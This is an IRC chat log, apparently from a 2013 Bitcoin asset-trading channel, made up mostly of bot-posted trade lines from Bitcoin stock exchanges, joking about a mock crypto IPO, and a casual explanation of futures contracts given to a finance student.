0.4983 BTC [-] Aug 30 21:30:54 cAM Aug 30 21:31:54 but but im working on virtual crypto active coin is gonna be the greatest company Aug 30 21:32:07 Amazing company? Aug 30 21:32:09 if i had a mining business, i would call it 'poopoo kaakaa' Aug 30 21:32:09 has the domain and logo and all Aug 30 21:32:14 yes amazing. Aug 30 21:32:16 no chi problems Aug 30 21:32:16 gecko_x2: will you buy if it has "bit"? :) Aug 30 21:32:30 no pankkake, forgot about that Aug 30 21:32:41 shit! I need to think of a new name then Aug 30 21:32:44 i have enough chi for everyone Aug 30 21:32:54 Hey gecko_x2, I'm IPOing VirtualActiveCryptoCoin, want to buy in? We're in the business of making business for business making businesses. Aug 30 21:32:57 [BTCTC] [LABCOIN] 40 @ 0.003388 = 0.1355 BTC [-] Aug 30 21:32:58 actually I have the best first word, just need a second one Aug 30 21:32:58 [BTCTC] [LABCOIN] 20 @ 0.003389 = 0.0678 BTC [+] Aug 30 21:32:59 [BTCTC] [LABCOIN] 465 @ 0.003413 = 1.587 BTC [+] Aug 30 21:33:00 [BTCTC] [LABCOIN] 4452 @ 0.003414 = 15.1991 BTC [+] Aug 30 21:33:01 [BTCTC] [LABCOIN] 1434 @ 0.003415 = 4.8971 BTC [+] Aug 30 21:33:09 Namworld that is already taken Aug 30 21:33:16 I irloled Aug 30 21:33:17 get your own cccc-ombo Aug 30 21:33:24 yea Aug 30 21:33:36 i'm in ! Aug 30 21:34:07 gonna be so rich Aug 30 21:34:28 [BTCTC] [LABCOIN] 86 @ 0.0035 = 0.301 BTC [+] Aug 30 21:34:31 Anyone realize a business making business would be somehow referring clients to a business or advertising. Aug 30 21:34:33 like 7% a week rich. Aug 30 21:34:34 Can i get a Board Seat> Aug 30 21:34:41 ?????? Aug 30 21:35:22 So by making business for business making businesses, we'd be pretty much referring businesses to a business generating business for said business we referred? Aug 30 21:35:29 Haha! Aug 30 21:35:55 will you hire Xzibit to do some consulting for you? Aug 30 21:36:07 YES YES and YES Aug 30 21:36:21 (Board seats require only 10 million USD in investment) Aug 30 21:36:45 since 1 bitcoin will be worth 10 million in 10 years, can I just pay later? Aug 30 21:36:53 lol Aug 30 21:37:25 [BTCTC] [LABCOIN] 1 @ 0.0035 BTC [+] Aug 30 21:37:37 [BTCTC] [BITVPS] 58 @ 0.002629 = 0.1525 BTC [-] Aug 30 21:38:11 Yes. Payable now. In ten years you'll be repaid 500 millions with 1 BTC because in another 10 years, that's what they'll be worth. Aug 30 21:38:19 [BTCTC] [NASTY-PT] 2 @ 0.002675 = 0.0054 BTC [+] Aug 30 21:38:50 Assumption based cycle Aug 30 21:42:18 lulzy Aug 30 21:42:48 business factory factory factory Aug 30 21:44:01 inspired by Java! Aug 30 21:46:48 [BTCTC] [DMS.MINING] 847 @ 0.003299 = 2.7943 BTC [+] Aug 30 21:47:56 [BTCTC] [DMS.MINING] 65 @ 0.003379 = 0.2196 BTC [+] Aug 30 21:47:57 [BTCTC] [DMS.MINING] 35 @ 0.003379 = 0.1183 BTC [+] Aug 30 21:48:26 [BTCTC] [MININGCO.ETF] 4 @ 0.09201 = 0.368 BTC [-] Aug 30 21:48:28 [BTCTC] [MININGCO.ETF] 2 @ 0.092 = 0.184 BTC [-] Aug 30 21:48:29 [BTCTC] [MININGCO.ETF] 1 @ 0.091 BTC [-] Aug 30 21:48:31 [BTCTC] [MININGCO.ETF] 2 @ 0.09 = 0.18 BTC [-] Aug 30 21:49:34 [BTCTC] [DMS.SELLING] 17 @ 0.0127 = 0.2159 BTC [-] Aug 30 21:49:36 [BTCTC] [DMS.SELLING] 100 @ 0.01265 = 1.265 BTC [-] Aug 30 21:49:37 [BTCTC] [DMS.SELLING] 200 @ 0.01259 = 2.518 BTC [-] Aug 30 21:49:38 [BTCTC] [DMS.SELLING] 50 @ 0.01258 = 0.629 BTC [-] Aug 30 21:49:40 [BTCTC] [DMS.SELLING] 510 @ 0.01253 = 6.3903 BTC [-] Aug 30 21:50:44 [BTCTC] [LABCOIN] 5 @ 0.003367 = 0.0168 BTC [-] Aug 30 21:50:45 [BTCTC] [LABCOIN] 20 @ 0.003366 = 0.0673 BTC [-] Aug 30 21:53:26 [BTCTC] [DMS.PURCHASE] 260 @ 0.01591 = 4.1366 BTC [-] Aug 30 21:56:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.02423 = 0.2423 BTC [+] Aug 30 21:56:50 [BTCTC] [TAT.ASICMINER] 50 @ 0.02422 = 1.211 BTC [-] Aug 30 21:58:56 [BTCTC] [TAT.ASICMINER] 4 @ 0.02559 = 0.1024 BTC [+] Aug 30 21:59:31 [BTCTC] [DMS.MINING] 80 @ 0.003299 = 0.2639 BTC [-] Aug 30 21:59:32 [BTCTC] [DMS.MINING] 180 @ 0.003299 = 0.5938 BTC [-] Aug 30 22:01:25 [BTCTC] [DMS.PURCHASE] 60 @ 0.01591 = 0.9546 BTC [-] Aug 30 22:02:22 [BTCTC] [COG.F2] 1 @ 4.999 BTC [+] Aug 30 22:06:08 [BTCTC] [COGNITIVE] 1 @ 0.315 BTC [+] Aug 30 22:06:10 [BTCTC] [COGNITIVE] 1 @ 0.31 BTC [-] Aug 30 22:06:11 [BTCTC] [COGNITIVE] 1 @ 0.3041 BTC [-] Aug 30 22:06:11 [BTCTC] [COGNITIVE] 2 @ 0.304 = 0.608 BTC [-] Aug 30 22:06:14 [BTCTC] [COGNITIVE] 5 @ 0.3033 = 1.5165 BTC [-] Aug 30 22:06:14 [BTCTC] [COGNITIVE] 1 @ 0.3 BTC [-] Aug 30 22:06:15 [BTCTC] [COGNITIVE] 1 @ 0.3 BTC [-] Aug 30 22:06:21 go go Aug 30 22:09:05 im now a bit millionaire ££££ Aug 30 22:09:51 http://www.youtube.com/watch?v=8zA0Y9SQBBc Aug 30 22:09:52 ARGUS-IS The world's highest resolution camera - YouTube Aug 30 22:13:03 [MPEX] [S.MPOE] 6900 @ 0.00087242 = 6.0197 BTC [-] Aug 30 22:15:28 [BTCTC] [DMS.MINING] 8 @ 0.003378 = 0.027 BTC [+] Aug 30 22:26:10 [BTCTC] [LABCOIN] 5 @ 0.003469 = 0.0173 BTC [+] Aug 30 22:26:11 [BTCTC] [LABCOIN] 20 @ 0.00347 = 0.0694 BTC [+] Aug 30 22:26:31 [BTCTC] [LABCOIN] 92 @ 0.00347 = 0.3192 BTC [+] Aug 30 22:31:20 [BTCTC] [DMS.SELLING] 1 @ 0.01289 BTC [+] Aug 30 22:32:54 [BTCTC] [DMS.PURCHASE] 1 @ 0.01591 BTC [-] Aug 30 22:34:48 [HAVELOCK] [SDSTM] 1 @ 0.00344182 BTC [+] Aug 30 22:37:22 [BTCTC] [DMS.MINING] 1 @ 0.003299 BTC [-] Aug 30 22:37:53 [BTCTC] [LABCOIN] 400 @ 0.003463 = 1.3852 BTC [-] Aug 30 22:43:28 [BTCTC] [BITVPS] 1 @ 0.002296 BTC [-] Aug 30 22:45:31 [BTCTC] [KENILWORTH] 5 @ 0.0018 = 0.009 BTC [+] Aug 30 22:55:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.02558 = 0.1023 BTC [-] Aug 30 22:56:00 [BTCTC] [LABCOIN] 75 @ 0.003365 = 0.2524 BTC [-] Aug 30 22:58:41 [HAVELOCK] [XBOND] 2 @ 0.0011 = 0.0022 BTC [-] Aug 30 22:59:50 [BTCTC] [LABCOIN] 6 @ 0.003448 = 0.0207 BTC [+] Aug 30 23:00:22 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.0008734 = 0.1747 BTC [+] Aug 30 23:00:55 [BTCTC] [ASICMINER-PT] 1 @ 2.529 BTC [+] Aug 30 23:01:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.02423 BTC [-] Aug 30 23:01:40 [BTCTC] [LABCOIN] 339 @ 0.003448 = 1.1689 BTC [+] Aug 30 23:01:58 [HAVELOCK] [LABCO] 4 @ 0.00327 = 0.0131 BTC [+] Aug 30 23:02:12 [BTCTC] [LABCOIN] 40 @ 0.003448 = 0.1379 BTC [+] Aug 30 23:02:46 [MPEX] [S.MPOE] 3667 @ 0.00087242 = 3.1992 BTC [-] Aug 30 23:02:48 [BTCTC] [LABCOIN] 250 @ 0.003448 = 0.862 BTC [+] Aug 30 23:03:35 [BTCTC] [RSM] 10 @ 0.0146 = 0.146 BTC [-] Aug 30 23:06:55 [BTCTC] [NASTY-PT] 32 @ 0.002675 = 0.0856 BTC [+] Aug 30 23:09:12 [BTCTC] [LABCOIN] 398 @ 0.003367 = 1.3401 BTC [-] Aug 30 23:09:30 [HAVELOCK] [LABCO] 398 @ 0.00327 = 1.3015 BTC [+] Aug 30 23:10:00 [BTCTC] [LABCOIN] 94 @ 0.003448 = 0.3241 BTC [+] Aug 30 23:10:01 [BTCTC] [LABCOIN] 1406 @ 0.00345 = 4.8507 BTC [+] Aug 30 23:10:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.02423 BTC [-] Aug 30 23:10:20 [BTCTC] [TAT.ASICMINER] 9 @ 0.02422 = 0.218 BTC [-] Aug 30 23:10:22 [BTCTC] [TAT.ASICMINER] 20 @ 0.02421 = 0.4842 BTC [-] Aug 30 23:10:23 [BTCTC] [TAT.ASICMINER] 54 @ 0.0242 = 1.3068 BTC [-] Aug 30 23:10:24 [BTCTC] [TAT.ASICMINER] 50 @ 0.0242 = 1.21 BTC [-] Aug 30 23:10:25 [BTCTC] [TAT.ASICMINER] 27 @ 0.02406 = 0.6496 BTC [-] Aug 30 23:10:26 [BTCTC] [TAT.ASICMINER] 423 @ 0.02405 = 10.1732 BTC [-] Aug 30 23:10:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.02404 = 0.0721 BTC [-] Aug 30 23:10:28 [BTCTC] [TAT.ASICMINER] 14 @ 0.02403 = 0.3364 BTC [-] Aug 30 23:10:29 [BTCTC] [TAT.ASICMINER] 18 @ 0.02402 = 0.4324 BTC [-] Aug 30 23:10:30 [BTCTC] [TAT.ASICMINER] 434 @ 0.02401 = 10.4203 BTC [-] Aug 30 23:10:31 [BTCTC] [TAT.ASICMINER] 33 @ 0.024 = 0.792 BTC [-] Aug 30 23:10:32 [BTCTC] [TAT.ASICMINER] 10 @ 0.024 = 0.24 BTC [-] Aug 30 23:10:33 [BTCTC] [TAT.ASICMINER] 2 @ 0.024 = 0.048 BTC [-] Aug 30 23:10:34 [BTCTC] [TAT.ASICMINER] 100 @ 0.024 = 2.4 BTC [-] Aug 30 23:15:32 [BTCTC] [KENILWORTH] 10000 @ 0.0018 = 18 BTC [+] Aug 30 23:16:58 [BTCTC] [BTC-GROWTH] 10 @ 0.09803 = 0.9803 BTC [-] Aug 30 23:17:55 [HAVELOCK] [AM100] 17 @ 0.0258 = 0.4386 BTC [-] Aug 30 23:17:58 [BTCTC] [ACTIVEMINING] 2 @ 0.004385 = 0.0088 BTC [-] Aug 30 23:18:11 [BTCTC] [ACTIVEMINING] 134 @ 0.004385 = 0.5876 BTC [-] Aug 30 23:18:36 [BTCTC] [BASIC-MINING] 1 @ 0.1973 BTC [+] Aug 30 23:18:50 [BTCTC] [LABCOIN] 46 @ 0.00344 = 0.1582 BTC [-] Aug 30 23:19:33 [HAVELOCK] [AM100] 32 @ 0.0259 = 0.8288 BTC [+] Aug 30 23:19:42 [BTCTC] [BASIC-MINING] 4 @ 0.1973 = 0.7892 BTC [+] Aug 30 23:20:15 [BTCTC] [ACTIVEMINING] 30 @ 0.004374 = 0.1312 BTC [-] Aug 30 23:22:04 [BTCTC] [LABCOIN] 50 @ 0.00345 = 0.1725 BTC [+] Aug 30 23:22:16 [BTCTC] [BASIC-MINING] 1 @ 0.1973 BTC [+] Aug 30 23:23:23 [BTCTC] [BASIC-MINING] 1 @ 0.1974 BTC [+] Aug 30 23:23:39 [BTCTC] [BASIC-MINING] 1 @ 0.1989 BTC [+] Aug 30 23:27:31 [BTCTC] [DMS.MINING] 24 @ 0.00337 = 0.0809 BTC [+] Aug 30 23:28:52 [BTCTC] [DMS.PURCHASE] 1 @ 0.01591 BTC [-] Aug 30 23:29:37 [BTCTC] [ASICMINER-PT] 1 @ 2.53 BTC [+] Aug 30 23:30:01 [HAVELOCK] [AM1] 2 @ 2.55 = 5.1 BTC [-] Aug 30 23:30:22 [BTCTC] [DMS.MINING] 46 @ 0.003377 = 0.1553 BTC [+] Aug 30 23:31:18 [BTCTC] [DMS.PURCHASE] 75 @ 0.01591 = 1.1933 BTC [-] Aug 30 23:32:29 [HAVELOCK] [AM100] 1 @ 0.0255 BTC [-] Aug 30 23:32:31 [HAVELOCK] [AM100] 1 @ 0.02532 BTC [-] Aug 30 23:32:33 [HAVELOCK] [AM100] 5 @ 0.0252 = 0.126 BTC [-] Aug 30 23:32:35 [HAVELOCK] [AM100] 14 @ 0.02515 = 0.3521 BTC [-] Aug 30 23:33:20 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0008734 BTC [+] Aug 30 23:35:03 ;;ticker Aug 30 23:35:04 MtGox BTCUSD ticker | Best bid: 137.24257, Best ask: 138.43985, Bid-ask spread: 1.19728, Last trade: 137.19115, 24 hour volume: 42348.59542853, 24 hour low: 128.56000, 24 hour high: 142.76173, 24 hour vwap: 136.01927 Aug 30 23:35:38 [HAVELOCK] [AM1] 6 @ 2.718 = 16.308 BTC [+] Aug 30 23:36:36 [HAVELOCK] [CFIG] 3 @ 0.17499999 = 0.525 BTC [+] Aug 30 23:36:38 [HAVELOCK] [CFIG] 97 @ 0.175 = 16.975 BTC [+] Aug 30 23:37:05 [BTCTC] [LABCOIN] 1 @ 0.003465 BTC [+] Aug 30 23:38:21 [BTCTC] [DMS.PURCHASE] 564 @ 0.01591 = 8.9732 BTC [-] Aug 30 23:39:15 [BTCTC] [DMS.SELLING] 1 @ 0.01289 BTC [+] Aug 30 23:41:47 [BTCTC] [TAT.MINIGAME] 6 @ 0.0002418 = 0.0015 BTC [+] Aug 30 23:42:22 [BTCTC] [DMS.PURCHASE] 1 @ 0.01591 BTC [-] Aug 30 23:43:34 [MPEX] [S.MPOE] 6190 @ 0.00086667 = 5.3647 BTC [-] Aug 30 23:44:35 [BTCTC] [ACTIVEMINING] 177 @ 0.00435 = 0.77 BTC [-] Aug 30 23:44:36 [BTCTC] [ACTIVEMINING] 44 @ 0.004347 = 0.1913 BTC [-] Aug 30 23:44:38 [BTCTC] [ACTIVEMINING] 74 @ 0.00433 = 0.3204 BTC [-] Aug 30 23:44:52 [BTCTC] [LABCOIN] 5 @ 0.003465 = 0.0173 BTC [+] Aug 30 23:46:48 [BTCTC] [DMS.MINING] 1 @ 0.003299 BTC [-] Aug 30 23:47:46 [MPEX] [S.MPOE] 14100 @ 0.00086667 = 12.22 BTC [-] Aug 30 23:47:50 [BTCTC] [LABCOIN] 397 @ 0.003412 = 1.3546 BTC [-] Aug 30 23:47:51 [BTCTC] [LABCOIN] 175 @ 0.00341 = 0.5968 BTC [-] Aug 30 23:58:58 [BTCTC] [LABCOIN] 302 @ 0.003465 = 1.0464 BTC [+] Aug 30 23:58:58 [BTCTC] [LABCOIN] 100 @ 0.003475 = 0.3475 BTC [+] Aug 30 23:59:11 [MPEX] [S.MPOE] 7500 @ 0.00086667 = 6.5 BTC [-] Aug 30 23:59:21 [BTCTC] [ASICMINER-PT] 1 @ 2.568 BTC [+] Aug 30 23:59:23 [BTCTC] [ASICMINER-PT] 1 @ 2.577 BTC [+] Aug 30 23:59:24 [BTCTC] [ASICMINER-PT] 1 @ 2.579 BTC [+] Aug 30 23:59:25 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [+] Aug 30 23:59:26 [BTCTC] [ASICMINER-PT] 1 @ 2.581 BTC [+] Aug 31 00:01:47 [BTCTC] [LABCOIN] 86 @ 0.003392 = 0.2917 BTC [-] Aug 31 00:04:02 [BTCTC] [ASICMINER-PT] 1 @ 2.513 BTC [-] Aug 31 00:04:02 [BTCTC] [ASICMINER-PT] 3 @ 2.513 = 7.539 BTC [-] Aug 31 00:04:04 [BTCTC] [ASICMINER-PT] 1 @ 2.512 BTC [-] Aug 31 00:04:05 [BTCTC] [ASICMINER-PT] 3 @ 2.51 = 7.53 BTC [-] Aug 31 00:05:36 [BTCTC] [LABCOIN] 100 @ 0.00346 = 0.346 BTC [+] Aug 31 00:05:37 [BTCTC] [LABCOIN] 1 @ 0.003499 BTC [+] Aug 31 00:05:38 [BTCTC] [LABCOIN] 298 @ 0.003499 = 1.0427 BTC [+] Aug 31 00:08:28 [BTCTC] [LABCOIN] 366 @ 0.003498 = 1.2803 BTC [-] Aug 31 00:09:54 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [+] Aug 31 00:11:33 [BTCTC] [ASICMINER-PT] 1 @ 2.55 BTC [-] Aug 31 00:12:08 [HAVELOCK] [AM100] 5 @ 0.02589 = 0.1295 BTC [+] Aug 31 00:13:24 [BTCTC] [DMS.MINING] 85 @ 0.0033 = 0.2805 BTC [+] Aug 31 00:13:26 [HAVELOCK] [AM100] 34 @ 0.0259 = 0.8806 BTC [+] Aug 31 00:14:28 [HAVELOCK] [XBOND] 6 @ 0.0011 = 0.0066 BTC [-] Aug 31 00:14:33 [BTCTC] [LABCOIN] 324 @ 0.003498 = 1.1334 BTC [-] Aug 31 00:15:52 http://trilema.com/2013/crash/ Aug 31 00:15:54 Crash pe Trilema - Un blog de Mircea Popescu. Aug 31 00:22:56 ;;nethash Aug 31 00:22:57 644339.642619 Aug 31 00:25:33 [HAVELOCK] [XBOND] 1 @ 0.0011 BTC [-] Aug 31 00:27:03 [MPEX] [S.MPOE] 2746 @ 0.00086581 = 2.3775 BTC [-] Aug 31 00:30:52 [HAVELOCK] [XBOND] 1 @ 0.0011 BTC [-] Aug 31 00:33:22 [BTCTC] [LABCOIN] 273 @ 0.003498 = 0.955 BTC [-] Aug 31 00:33:23 [BTCTC] [LABCOIN] 1227 @ 0.0035 = 4.2945 BTC [+] Aug 31 00:36:46 [BTCTC] [BASIC-MINING] 1 @ 0.184 BTC [-] Aug 31 00:36:47 [BTCTC] [BASIC-MINING] 1 @ 0.183 BTC [-] Aug 31 00:36:49 [BTCTC] [BASIC-MINING] 3 @ 0.181 = 0.543 BTC [-] Aug 31 00:36:50 [BTCTC] [BASIC-MINING] 5 @ 0.1802 = 0.901 BTC [-] Aug 31 00:36:51 [BTCTC] [BASIC-MINING] 10 @ 0.1801 = 1.801 BTC [-] Aug 31 00:36:52 [BTCTC] [BASIC-MINING] 10 @ 0.18 = 1.8 BTC [-] Aug 31 00:36:53 [BTCTC] [BASIC-MINING] 10 @ 0.18 = 1.8 BTC [-] Aug 31 00:37:32 [BTCTC] [ASICMINER-PT] 2 @ 2.537 = 5.074 BTC [-] Aug 31 00:38:35 [BTCTC] [TAT.ASICMINER] 85 @ 0.02527 = 2.148 BTC [+] Aug 31 00:41:04 [BTCTC] [BITVPS] 110 @ 0.002629 = 0.2892 BTC [+] Aug 31 00:41:28 [BTCTC] [BITVPS] 1 @ 0.002629 BTC [+] Aug 31 00:41:44 [HAVELOCK] [XBOND] 73 @ 0.0011 = 0.0803 BTC [-] Aug 31 00:42:54 [BTCTC] [COGNITIVE] 10 @ 0.296 = 2.96 BTC [-] Aug 31 00:42:55 [BTCTC] [COGNITIVE] 1 @ 0.295 BTC [-] Aug 31 00:42:57 [BTCTC] [COGNITIVE] 1 @ 0.2885 BTC [-] Aug 31 00:42:58 [BTCTC] [COGNITIVE] 1 @ 0.2801 BTC [-] Aug 31 00:42:59 [BTCTC] [COGNITIVE] 10 @ 0.28 = 2.8 BTC [-] Aug 31 00:43:00 [BTCTC] [COGNITIVE] 1 @ 0.2701 BTC [-] Aug 31 00:43:01 [BTCTC] [COGNITIVE] 5 @ 0.27 = 1.35 BTC [-] Aug 31 00:43:02 [BTCTC] [COGNITIVE] 1 @ 0.2597 BTC [-] Aug 31 00:43:03 [BTCTC] [COGNITIVE] 1 @ 0.2558 BTC [-] Aug 31 00:43:04 [BTCTC] [COGNITIVE] 10 @ 0.25 = 2.5 BTC [-] Aug 31 00:52:32 [BTCTC] [LABCOIN] 150 @ 0.003498 = 0.5247 BTC [-] Aug 31 00:55:30 [HAVELOCK] [XBOND] 961 @ 0.0011 = 1.0571 BTC [-] Aug 31 00:58:38 [MPEX] [S.MPOE] 3600 @ 0.00086667 = 3.12 BTC [+] Aug 31 00:58:57 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Aug 31 01:03:15 [BTCTC] [LABCOIN] 20 @ 0.003497 = 0.0699 BTC [-] Aug 31 01:03:16 [BTCTC] [LABCOIN] 78 @ 0.003498 = 0.2728 BTC [+] Aug 31 01:03:18 [HAVELOCK] [XBOND] 6 @ 0.00113 = 0.0068 BTC [+] Aug 31 01:05:14 [BTCTC] [BTC-BOND] 10 @ 0.01 = 0.1 BTC [+] Aug 31 01:06:32 [BTCTC] [TAT.ASICMINER] 11 @ 0.02401 = 0.2641 BTC [-] Aug 31 01:06:50 [BTCTC] [LABCOIN] 25 @ 0.003449 = 0.0862 BTC [-] Aug 31 01:06:51 [BTCTC] [LABCOIN] 25 @ 0.003448 = 0.0862 BTC [-] Aug 31 01:06:52 [BTCTC] [LABCOIN] 5 @ 0.003438 = 0.0172 BTC [-] Aug 31 01:06:53 [BTCTC] [LABCOIN] 5 @ 0.003412 = 0.0171 BTC [-] Aug 31 01:06:54 [BTCTC] [LABCOIN] 511 @ 0.003412 = 1.7435 BTC [-] Aug 31 01:06:55 [BTCTC] [LABCOIN] 7 @ 0.003411 = 0.0239 BTC [-] Aug 31 01:06:56 [BTCTC] [LABCOIN] 100 @ 0.00341 = 0.341 BTC [-] Aug 31 01:06:58 [BTCTC] [LABCOIN] 276 @ 0.003405 = 0.9398 BTC [-] Aug 31 01:06:59 [BTCTC] [LABCOIN] 9 @ 0.003402 = 0.0306 BTC [-] Aug 31 01:07:00 [BTCTC] [LABCOIN] 200 @ 0.003401 = 0.6802 BTC [-] Aug 31 01:07:01 [BTCTC] [LABCOIN] 167 @ 0.0034 = 0.5678 BTC [-] Aug 31 01:07:02 [BTCTC] [LABCOIN] 127 @ 0.00339 = 0.4305 BTC [-] Aug 31 01:07:02 [BTCTC] [LABCOIN] 17 @ 0.003381 = 0.0575 BTC [-] Aug 31 01:07:03 [BTCTC] [LABCOIN] 68 @ 0.00338 = 0.2298 BTC [-] Aug 31 01:07:04 [BTCTC] [LABCOIN] 125 @ 0.003376 = 0.422 BTC [-] Aug 31 01:07:05 [BTCTC] [LABCOIN] 500 @ 0.003375 = 1.6875 BTC [-] Aug 31 01:07:06 [BTCTC] [LABCOIN] 96 @ 0.003355 = 0.3221 BTC [-] Aug 31 01:07:08 [BTCTC] [LABCOIN] 173 @ 0.00333 = 0.5761 BTC [-] Aug 31 01:07:09 [BTCTC] [LABCOIN] 599 @ 0.003329 = 1.9941 BTC [-] Aug 31 01:09:21 [BTCTC] [DMS.MINING] 3 @ 0.00335 = 0.0101 BTC [+] Aug 31 01:14:52 [BTCTC] [DMS.MINING] 2 @ 0.00335 = 0.0067 BTC [+] Aug 31 01:15:28 [BTCTC] [LABCOIN] 6 @ 0.003486 = 0.0209 BTC [+] Aug 31 01:16:13 [BTCTC] [DMS.MINING] 11 @ 0.0033 = 0.0363 BTC [-] Aug 31 01:17:15 [BTCTC] [LTC-ATF.B2] 4 @ 0.0104 = 0.0416 BTC [+] Aug 31 01:23:00 hey guys question regarding futures - why do people that are not hedging a postion they have buy futures? Generally future prices are below the today price of a stock or commodity. Why not just sell at todays price instead of 30 days from now if you arent trying to hedge something? Aug 31 01:23:16 leverage Aug 31 01:23:44 is there any way of profiting from buying a futures contract if i dont have a position in that stock? Aug 31 01:23:57 yes, by selling the contract. Aug 31 01:24:13 such as options, where in many cases u never hold the stock u just lose or instantly profit if u buy at a strike price Aug 31 01:24:31 okay so offering a contract is always +EV i assume well in most cases. Aug 31 01:24:40 kingofsports if the price in the future is below the spot and you don't need the item until the future then of course you buy the future Aug 31 01:24:40 since u offer a lower price paid in 30 days Aug 31 01:24:42 it's cheaper. Aug 31 01:25:08 ah i just dont understand how futures is similar to options, someone told me that. Aug 31 01:25:29 well i guess you got some reading to do. Aug 31 01:26:01 i just dont see why it would be beneficial to BUY an offered future, if u could sell for more at todays price. Aug 31 01:26:25 i cant see how THAT MANY people would buy futures cause they are in a stuck postion til that length of time goes by, but futures are huge. Aug 31 01:26:35 hence the reading. Aug 31 01:26:55 i could def see how offering a future price could be profitablre. Aug 31 01:27:12 look. are you married ? Aug 31 01:27:17 [BTCTC] [DMS.MINING] 104 @ 0.0033 = 0.3432 BTC [-] Aug 31 01:27:30 im 19, finance and accounting student. 2nd year. Aug 31 01:27:32 single. Aug 31 01:27:50 cool. so if you can either pay 10k for a wedding ring right now, or $100 for a wedding ring in 2015 Aug 31 01:27:57 which would you prefer ? Aug 31 01:28:09 $100 in 2015 Aug 31 01:28:10 none of the above Aug 31 01:28:15 there you go. that's your future. Aug 31 01:28:19 you've just bought one. Aug 31 01:28:30 kakobrekla he's 19 not 29. give the guy time. Aug 31 01:28:52 gotta start educating early when the brain is young Aug 31 01:29:50 what im saying is, how is it profitable to buy an offered future. Say bitcoins are selling for $130 today, and someone offers a 30 day future of $120. Why is there any demand for that future when someone could sell today for $130. Aug 31 01:29:52 anyway sorry for the intrusion, carry on Aug 31 01:30:06 i understand how its profitable for the person offering the future below spot price. Aug 31 01:30:14 cause if price stays the same they make money in 30 days Aug 31 01:30:38 nah, im done. Aug 31 01:30:42 why would someone take my $120 in 30 days future when they could sell btc now for $130 is what im asking. whats the motivation / reason behind it. Aug 31 01:31:48 cmon im trying to understand it. I read about it but i still dont see why anyone would take a future when they could sell for more TODAY. i watched TDameritrade all their videos and simulations. Options understood, forex ehh understood for most part but futures i dont see the one side why anyone would do it. Aug 31 01:32:30 you realise the payment is now, and the delivery later ? Aug 31 01:32:33 like for your example mirceau why would anyone offer u to sell the ring for $100 in 2 years when they could sell it for $10000 now? Aug 31 01:32:44 oh Aug 31 01:32:49 [BTCTC] [COG.F2] 1 @ 4.997 BTC [-] Aug 31 01:32:51 [BTCTC] [COG.F2] 1 @ 4.998 BTC [+] Aug 31 01:33:01 that clears it up somewhat. Aug 31 01:33:31 so if $100 right now for a ring i don't have to deliver for 16 months is worth 9900 for me, i'll offer that deal. Aug 31 01:33:50 now i understand it better. now i see. companies make sure steady revenue no matter what thru these futures. Aug 31 01:33:52 got it. Aug 31 01:34:08 exactly. Aug 31 01:34:19 shit's explained nicely on my blog, but sadly it's in romanian. Aug 31 01:34:31 i hear people get absolutely killed sometimes in futures if they dont know what their doing, to me tho it sounds less risky then options tho Aug 31 01:34:46 it IS less risky than options. it's horribly risky nevertheless. Aug 31 01:34:54 oh okay Aug 31 01:35:04 theres youtube vids of ppl losing life savings in instants Aug 31 01:35:10 thru futures Aug 31 01:35:25 there's youtube videos of idiots losing lives in instants through chainsaws Aug 31 01:35:27 what's in a video. Aug 31 01:36:01 [HAVELOCK] [XBOND] 2 @ 0.00119 = 0.0024 BTC [+] Aug 31 01:36:22 lol true Aug 31 01:36:23 [MPEX] [S.MPOE] 7922 @ 0.00086667 = 6.8658 BTC [+] Aug 31 01:36:24 [MPEX] [S.MPOE] 580 @ 0.00086732 = 0.503 BTC [+] Aug 31 01:37:08 [BTCTC] [ASICMINER-PT] 1 @ 2.552 BTC [+] Aug 31 01:37:10 [BTCTC] [ASICMINER-PT] 1 @ 2.557 BTC [+] Aug 31 01:37:46 now mircea what happens if the company fails to deliver is it legally actionable? Aug 31 01:38:04 [BTCTC] [BASIC-MINING] 3 @ 0.1977 = 0.5931 BTC [+] Aug 31 01:38:04 say i offer futures of $120 for 10 BTC, and person fails to deliver but i have all their info and the contract. Aug 31 01:38:05 [BTCTC] [BASIC-MINING] 2 @ 0.1977 = 0.3954 BTC [+] Aug 31 01:38:11 duh its a contract nvm. Aug 31 01:38:39 hey Aug 31 01:38:44 futures are standardised contracts. you get cleared by a clearing house or somesuch Aug 31 01:39:24 Does chang ever show his face around here? Aug 31 01:39:45 what's up arandomer? Aug 31 01:39:56 nothing much, ben, what about yourself? Aug 31 01:39:57 ah okay Aug 31 01:40:09 arandomer: he's around from time to time Aug 31 01:40:18 arandomer you can use ;;seen Aug 31 01:40:26 ;; seen mircea_popescu Aug 31 01:40:26 mircea_popescu was last seen in #bitcoin-assets 7 seconds ago: arandomer you can use ;;seen Aug 31 01:40:46 mircea_popescu, I saw some of your posts on Reddit Aug 31 01:40:59 anything good ? Aug 31 01:41:15 Eh, wasn't too bad. Aug 31 01:41:32 ;;last ASIC share price Aug 31 01:41:33 (last [--{from,in,on,with,without,regexp} ] [--nolimit]) -- Returns the last message matching the given criteria. --from requires a nick from whom the message came; --in requires a channel the message was sent to; --on requires a network the message was sent on; --with requires some string that had to be in the message; --regexp requires a regular expression the message must (1 more message) Aug 31 01:42:02 is there a way to look at the options book for ASIC shares? Aug 31 01:42:08 thru this chat Aug 31 01:42:21 afaik the only book access is via mpexbot Aug 31 01:42:31 $depth s.mg Aug 31 01:42:32 mircea_popescu: S.MG Bids: ['3300 @ 0.00018', '15000 @ 0.0001711', '4686 @ 0.000171', '10000 @ 0.00017', '20000 @ 0.000165'] Aug 31 01:42:34 mircea_popescu: Asks: ['10000 @ 0.0002185', '15000 @ 0.00021899', '10000 @ 0.000219', '17184 @ 0.00022', '10000 @ 0.000235'] Aug 31 01:43:11 [BTCTC] [LABCOIN] 400 @ 0.003499 = 1.3996 BTC [+] Aug 31 01:43:17 hi all, satoshi square bratislava made ~ 3 transactions in about 10 btc total Aug 31 01:43:26 pix ? vids ? hot chix ? Aug 31 01:43:35 price between 85-89 eur Aug 31 01:43:42 :] Aug 31 01:43:48 man i understand options and the risks now i just gotta understand how to read the 